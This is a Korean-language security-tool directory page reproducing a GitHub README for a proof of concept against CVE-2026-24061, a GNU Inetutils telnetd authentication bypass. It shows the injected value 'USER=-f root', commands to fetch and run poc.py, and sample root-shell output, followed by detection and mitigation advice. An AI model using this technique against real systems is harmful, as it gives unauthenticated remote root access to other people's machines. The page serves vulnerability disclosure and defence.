Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-24061-Telnetd — CVE-2026-24061 GNU Inetutils Telnetd 인증 우회 | Kitploit
도구/GitHubGitHub/ish3ng0m4/cve-2026-24061-telnetd
Vulnerability AnalysisExploitationPenetration TestingAuthenticationLearning & EducationRemote Access Tool
GitHubish3ng0m4/cve-2026-24061-telnetd

CVE-2026-24061-Telnetd

CVE-2026-24061 GNU Inetutils Telnetd 인증 우회

저장소 보기
6시간 5분 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-24061
GNU Inetutils Telnetd 인증 우회

CVE: CVE-2026-24061
심각도: 치명적(Critical)
CVSS: 9.8 (치명적)
CWE: CWE-88 — 명령에서 인수 구분자의 부적절한 중립화
영향을 받는 구성 요소: GNU Inetutils telnetd
영향을 받는 버전: 1.9.3 ~ 2.7

개요

CVE-2026-24061은 GNU Inetutils가 제공하는 Telnet 서버 구현에서 발생하는 치명적인 인증 우회 취약점입니다. 이 취약점은 Telnet 자동 로그인이 활성화된 상태에서 클라이언트가 제어하는 USER 환경 변수에 대한 검증이 불충분하여 발생합니다. 악의적인 값은 사용자 이름이 아닌 시스템 login 프로그램의 옵션으로 해석될 수 있습니다. 취약한 구성에서 인증되지 않은 원격 공격자는 이 동작을 악용하여 login을 -f 옵션으로 호출하고 인증을 우회하여 요청된 계정의 권한으로 셸을 획득할 수 있습니다.

영향을 받는 Telnet 서비스가 root 권한으로 실행 중인 경우, 성공적인 악용은 인증되지 않은 원격 root 접근으로 이어질 수 있습니다.

기술적 설명

취약한 실행 흐름은 다음과 같이 요약할 수 있습니다:

root@kitploit:~
 Telnet 클라이언트
      │
      │ USER=-f root
      ▼
    telnetd
      │
      │ login 인수 구성
      ▼
 login -f root
      │
      │ 인증 우회
      ▼
 root 셸

이 문제는 Telnet의 자동 로그인 기능과 USER 환경 변수 처리 간의 상호 작용을 통해 트리거됩니다.

공격자가 제어하는 값:

root@kitploit:~
 -f root

은(는) 엄격하게 사용자 이름으로 처리되지 않습니다. 대신 login의 인수가 되어 다음과 같은 동작과 동일한 결과를 초래합니다:

root@kitploit:~
 login -f root

-f 옵션은 login이 지정된 사용자에 대해 일반적인 인증 프로세스를 우회하도록 지시합니다.

개념 증명 PoC

이 저장소에는 Telnet 연결을 수행하고, 필요한 프로토콜 협상을 처리하며, 악성 USER 값을 주입하고, 결과 세션을 검증하는 Python 3 개념 증명이 포함되어 있습니다.

저장소 복제 (권장)

root@kitploit:~
 git clone https://github.com/Ish3ng0m4/CVE-2026-24061-Telnetd.git
 cd CVE-2026-24061-Telnetd
 chmod +x poc.py
 python3 poc.py <TARGET> <PORT>

poc.py만 다운로드

root@kitploit:~
 wget https://raw.githubusercontent.com/Ish3ng0m4/CVE-2026-24061-Telnetd/main/poc.py

사용법

PoC를 실행 가능하게 만듭니다:

root@kitploit:~
 chmod +x poc.py

대상 주소와 Telnet 포트를 지정하여 실행합니다:

root@kitploit:~
 python3 poc.py <TARGET> <PORT>

예시:

root@kitploit:~
 python3 poc.py 127.0.0.1 23

성공적인 악용

취약한 대상은 다음과 유사한 출력을 생성합니다:

CVE-2026-24061 - GNU Inetutils telnetd 인증 우회

root@kitploit:~
 [*] 대상: 127.0.0.1:23
 [+] 연결됨
 [*] USER=-f root 주입
 
 [+] 취약함(VULNERABLE)

그런 다음 PoC는 대화형 세션을 제공합니다.

권한 상승은 다음으로 확인할 수 있습니다:

root@kitploit:~
 id

예상 결과:

root@kitploit:~
 uid=0(root) gid=0(root) groups=0(root)

이는 Telnet 인증 메커니즘이 우회되었고 결과 세션이 root 권한을 가짐을 확인합니다.

PoC 워크플로우

이 익스플로잇은 다음 작업을 수행합니다:

대상 Telnet 서비스에 연결합니다. 필요한 Telnet 프로토콜 협상을 수행합니다. 악용에 필요한 자동 로그인 동작을 활성화합니다. 악성 USER=-f root 값을 제공합니다. 취약한 telnetd 구현이 조작된 값을 login에 전달하도록 합니다. 결과 세션을 수신합니다. 운영자에게 대화형 터미널을 제공합니다.

PoC는 취약한 인증 경로에 대해 자격 증명에 의존하지 않습니다.

영향을 받는 구성

악용은 대상 구성과 telnetd 및 시스템의 login 구현 간의 상호 작용에 따라 달라집니다.

주요 조건은 다음과 같습니다:

영향을 받는 버전 범위 내의 GNU Inetutils telnetd.
공격자가 접근할 수 있는 Telnet 서비스.
자동 로그인 기능이 활성화되었거나 사용 가능한 상태.
USER 환경 변수의 취약한 처리.
주입된 옵션을 해석할 수 있는 호환 가능한 login 구현.

결과적으로, 영향을 받는 Inetutils 버전의 존재만으로 악용 가능성을 증명하는 것으로 간주해서는 안 됩니다. 배포판 패치와 서비스 구성도 고려해야 합니다.

영향

CVE-2026-24061은 취약한 시스템을 완전히 손상시킬 수 있습니다.

telnetd가 실행되는 권한에 따라 악용은 다음을 제공할 수 있습니다:

인증 우회
인가되지 않은 로컬 계정 접근
원격 명령 실행
권한 상승
Root 수준 접근
완전한 시스템 손상

최고 위험 시나리오는 원격으로 접근 가능한 Telnet 서비스에서 악용으로 인해 root 세션이 발생하는 경우입니다.

탐지

악용 가능성을 나타내는 지표는 다음과 같습니다:

TCP/23에 대한 예기치 않은 연결.
비정상적인 사용자 이름을 사용한 Telnet 인증 시도.
명령줄 옵션으로 시작하는 의심스러운 USER 값.
예기치 않은 login 프로세스 인수.
telnetd에서 발생한 root 세션.
Telnet 서비스에 의해 생성된 예기치 않은 프로세스.

네트워크 모니터링은 Telnet 서비스를 불필요하게 노출하는 시스템도 식별해야 합니다.

완화

권장되는 대응은 Telnet을 제거하고 원격 관리를 위해 SSH를 사용하는 것입니다.

Telnet을 즉시 제거할 수 없는 경우:

보안 수정이 포함된 공급업체 제공 버전으로 업그레이드합니다.
적절한 운영 체제 보안 업데이트를 적용합니다.
TCP/23을 신뢰할 수 있는 관리 네트워크로 제한합니다.
Telnet이 신뢰할 수 없는 네트워크에 직접 노출되는 것을 방지합니다.
Telnet 인증 및 프로세스 활동을 모니터링합니다.

Linux 배포판은 업스트림 버전 번호를 변경하지 않고 보안 수정을 백포트할 수 있으므로, 관리자는 표시된 버전에만 의존하지 말고 배포판 패키지의 보안 상태를 확인해야 합니다.

검증

이 취약점은 Ubuntu 22.04.5 LTS에서 실행되는 취약한 GNU Inetutils Telnet 서비스에 대해 성공적으로 재현되었습니다.

PoC는 TCP/23에 연결을 설정하고 다음을 주입했습니다:

root@kitploit:~
 USER=-f root

그리고 root 세션을 획득했습니다.

권한 확인 결과:

root@kitploit:~
 uid=0(root) gid=0(root) groups=0(root)

이는 보안 영향에 대한 직접적인 확인을 제공합니다.

면책 조항

이 개념 증명은 보안 연구, 취약점 검증, 공인된 침투 테스트 및 교육 목적으로 제공됩니다.

명시적 승인을 받은 시스템에서만 테스트하십시오.

Gabriel D. Ishengoma
공격적 보안 · 사이버 보안 연구 · 디지털 포렌식

도구 다운로드